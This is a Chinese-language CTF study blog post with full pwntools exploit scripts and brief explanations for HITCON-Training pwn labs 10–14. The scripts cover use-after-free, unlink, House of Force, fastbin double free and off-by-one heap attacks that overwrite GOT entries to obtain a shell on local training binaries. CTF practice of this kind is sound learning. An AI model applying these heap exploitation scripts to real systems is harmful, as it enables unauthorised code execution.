复习一波pwn

HITCON-Training

HITCON-Training

lab10

image-20200906224803905

典型的菜单

delete后没有置零存在UAF

目的很明显

image-20200906225039587

print这边会有个调用,吧原来puts函数hook即可

image-20200906225107873

可以发现程序右后门

根据first fit

分配俩个大小大于8的堆,free后再分配个大小为8即可拿到原来堆块notelist那块

然后因为没有置0,再次调用print即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *
a = process("hacknote")

def add(size,content):
a.recvuntil("Your choice :")
a.send('1')
a.recvuntil("Note size :")
a.send(str(size))
a.recvuntil("Content :")
a.send(content)

def delete(index):
a.recvuntil("Your choice :")
a.send('2')
a.recvuntil("Index :")
a.send(str(index))

def printffunc(index):
a.recvuntil("Your choice :")
a.send('3')
a.recvuntil("Index :")
a.send(str(index))

pay = p32(0x8048986)
add(16,'aaa')
add(16,'bbb')
delete(0)
delete(1)
add(8,pay)
printffunc(0)
a.interactive()

lab11

unlink

俩种打法,这边是第一种unlink

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
a = process("./bamboobox")
libc = ELF("./libc-2.23.so")
elf = ELF("./bamboobox")
def add(size,content):
a.recvuntil("Your choice:")
a.sendline('2')
a.recvuntil("Please enter the length of item name:")
a.sendline(str(size))
a.recvuntil("Please enter the name of item:")
a.sendline(content)

def delete(index):
a.recvuntil("Your choice:")
a.sendline('4')
a.recvuntil("Please enter the index of item:")
a.sendline(str(index))

def show(index):
a.recvuntil("Your choice:")
a.sendline('1')

def edit(index,size,content):
a.recvuntil("Your choice:")
a.sendline('3')
a.recvuntil("Please enter the index of item:")
a.sendline(str(index))
a.recvuntil("Please enter the length of item name:")
a.sendline(str(size))
a.recvuntil("Please enter the new name of the item:")
a.sendline(content)

#gdb.attach(a,'b *0x400E42')
chunk = 0x6020C8
add(0x80,'111')
add(0x80,'222')
add(0x80,'333')
pay = p64(0) + p64(0x80+1) + p64(chunk-0x18) + p64(chunk - 0x10)
pay += 'a'*(0x80-0x20)
pay += p64(0x80)+p64(0x90)
edit(0,len(pay),pay)
delete(1)
pay = p64(0)*2 + p64(0x80) + p64(elf.got['atoi'])
edit(0,len(pay),pay)
show(0)
a.recvuntil("0 : ")
atoi = u64(a.recv(6).ljust(8,"\x00"))
base = atoi - libc.symbols["atoi"]
system = base + libc.symbols["system"]
edit(0,8,p64(system))
a.recvuntil("Your choice:")
a.sendline('sh')
a.interactive()

image-20200907205654758

delete的时候置零了不存再uaf

image-20200907205726268

change没有检测大小,存在堆溢出

所以可以用unlink分配任意地址,修改地址处为某函数got表后leak计算system地址修改后get shell

House Of Force

还有一种打法就是House Of Force,目的和unlink一样就是任意地址写,判断用哪种方法主要取决于pie

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
a = process("./bamboobox")
libc = ELF("./libc-2.23.so")
elf = ELF("./bamboobox")
def add(size,content):
a.recvuntil("Your choice:")
a.send('2')
a.recvuntil("Please enter the length of item name:")
a.send(str(size))
a.recvuntil("Please enter the name of item:")
a.send(content)

def delete(index):
a.recvuntil("Your choice:")
a.send('4')
a.recvuntil("Please enter the index of item:")
a.send(str(index))

def show(index):
a.recvuntil("Your choice:")
a.send('1')

def edit(index,size,content):
a.recvuntil("Your choice:")
a.send('3')
a.recvuntil("Please enter the index of item:")
a.send(str(index))
a.recvuntil("Please enter the length of item name:")
a.send(str(size))
a.recvuntil("Please enter the new name of the item:")
a.send(content)

#gdb.attach(a,'b *0x400d49')
magic = 0x400d49
add(0x40,'aaa')
pay = 'a'*0x40 + p64(0) + p64(0xffffffffffffffff)
edit(0,0x51,pay)
add(-128,'abc')
add(0x10,p64(magic)*2)
a.recvuntil("Your choice:")
a.send('5')
a.interactive()

具体利用方法就是修改top chunk大小为-1然后计算偏移覆盖一开始malloc得堆块函数指针为magic即可

lab12

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from pwn import *
a = process("./secretgarden")
libc = ELF("./libc-2.23.so")
elf = ELF("./secretgarden")
def add(size,content,color):
a.recvuntil("Your choice : ")
a.sendline('1')
a.recvuntil("Length of the name :")
a.sendline(str(size))
a.recvuntil("The name of flower :")
a.send(content)
a.recvuntil("The color of the flower :")
a.sendline(color)

def delete(index):
a.recvuntil("Your choice : ")
a.sendline('3')
a.recvuntil("Which flower do you want to remove from the garden:")
a.sendline(str(index))

def show():
a.recvuntil("Your choice : ")
a.sendline('2')

def clean():
a.recvuntil("Your choice : ")
a.sendline('4')

gdb.attach(a,'b *0x400C7B')
add(0x50,'aaa','123')
add(0x50,'bbb','123')
delete(0)
delete(1)
delete(0)
add(0x50,p64(0x601ffa),'123')
add(0x50,'ccc','123')
add(0x50,'ddd','123')
add(0x50,'a'*6+p64(0)+p64(0x400C7B)*2,'123')
a.interactive()

Fastbin Double Free

image-20200910153738019

image-20200910153918730

大致结构如上

主要漏洞函数再del那

image-20200910153943896

可以double free,直接覆盖got表即可

lab13

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import *
r = process("./heapcreator")
libc = ELF("./libc-2.23.so")
elf = ELF("./heapcreator")
def create(size,content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)

def edit(idx,content):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(content)

def show(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))

def delete(idx):
r.recvuntil(":")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))

#gdb.attach(r,'b *0x400D7B')
free_got = 0x602018
create(0x18,'aaa')
create(0x10,'bbb')
pay = 'a'*0x10 + p64(0) +'\x41'
edit(0,pay)
delete(1)
pay = p64(0)*4 + p64(0x30) + p64(elf.got['atoi'])
create(0x30,pay)
show(1)
r.recvuntil("Content : ")
func = u64(r.recv(6).ljust(8,'\x00'))
print hex(func)
base = func - libc.symbols['atoi']
system = base + libc.symbols['system']
edit(1,p64(system))
r.recvuntil(":")
r.sendline("sh")
r.interactive()

image-20200911004553484

heap off by one

正好可以覆盖下一个堆块的size域,修改大小为0x41,下一次就能覆盖heaparray中的值为got,leak后再次覆盖就可以劫持got表

image-20200911172152145

这时候直接输入sh就能拿到shell

lab14

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
r = process("./magicheap")
libc = ELF("./libc-2.23.so")
elf = ELF("./magicheap")

def create_heap(size,content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)

def edit_heap(idx,size,content):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)

def del_heap(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))


chunk = 0x6020E0
create_heap(0x80,'aaa')
create_heap(0x80,'bbb')
create_heap(0x80,'ccc')
pay = p64(0) + p64(0x80+1) + p64(chunk-0x18) + p64(chunk - 0x10)
pay += 'a'*(0x80-0x20)
pay += p64(0x80)+p64(0x90)
edit_heap(0,len(pay),pay)
del_heap(1)
#gdb.attach(r,'b *0x400C8C')
edit_heap(0,0x20,p64(0)*3+p64(0x6020c0))
edit_heap(0,0x10,p64(0x1306))
r.recvuntil(":")
r.sendline("4869")
r.interactive()

还是unlink

文章目录
  1. 1. HITCON-Training
    1. 1.1. lab10
    2. 1.2. lab11
      1. 1.2.1. unlink
      2. 1.2.2. House Of Force
    3. 1.3. lab12
    4. 1.4. lab13
    5. 1.5. lab14
|